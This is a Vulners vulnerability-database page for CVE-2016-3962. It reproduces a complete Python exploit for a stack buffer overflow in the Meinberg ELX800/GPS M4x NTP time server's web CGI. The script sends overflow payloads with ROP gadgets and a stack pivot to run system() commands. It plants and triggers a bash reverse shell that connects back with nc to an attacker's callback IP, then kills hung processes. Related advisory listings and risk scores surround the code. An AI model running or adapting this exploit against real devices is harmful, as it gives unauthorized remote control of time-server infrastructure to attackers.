Vulners
Lucene search
Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges | 17 Jul 201600:00 | – | zdt |
 | Stack Buffer Overflow Vulnerability in Multiple Meinberg Products (CNVD-2016-04405) | 28 Jun 201600:00 | – | cnvd |
 | CVE-2016-3962 | 3 Jul 201614:00 | – | cve |
 | CVE-2016-3962 | 3 Jul 201614:00 | – | cvelist |
 | Meinberg NTP Time Server ELX800GPS M4x V5.30p - Remote Command Execution Escalate Privileges | 17 Jul 201600:00 | – | exploitpack |
 | CVE-2016-3962 | 3 Jul 201614:59 | – | nvd |
 | Meinberg LANTIME < 6.20.005 Multiple Vulnerabilities (MBGSA-1604) | 24 Jun 201600:00 | – | openvas |
 | Meinberg NTP Time Server ELX800/GPS M4x 5.30p Command Execution | 18 Jul 201600:00 | – | packetstorm |
 | Stack overflow | 3 Jul 201614:59 | – | prion |
 | Meinberg NTP Improper Restriction of Operations within the Bounds of a Memory Buffer (CVE-2016-3962) | 4 Dec 202400:00 | – | nessus |
10
#!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications
# Kernel Version: 2.6.15.1
# System Version: 530
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p
import socket
import struct
import telnetlib
import sys
import time
if len(sys.argv) < 3:
print "[-] <Host> <Callback IP> "
exit(1)
host = sys.argv[1]
callback_ip = sys.argv[2]
print "[+] exploiting Meinburg M400"
port = 80
###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /file/tmp
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
###################################################################
#
# Copy /www/filetmp to user_defined_notification
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close
time.sleep(1)
###################################################################
#
# Trigger reverse shell
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
print "[+] cleaning up"
###################################################################
#
# Kill all mains that are hung-up
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
command = 'killall main'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
print "[+] enjoy"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2016 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 37.3
CVSS 27.5
EPSS0.11164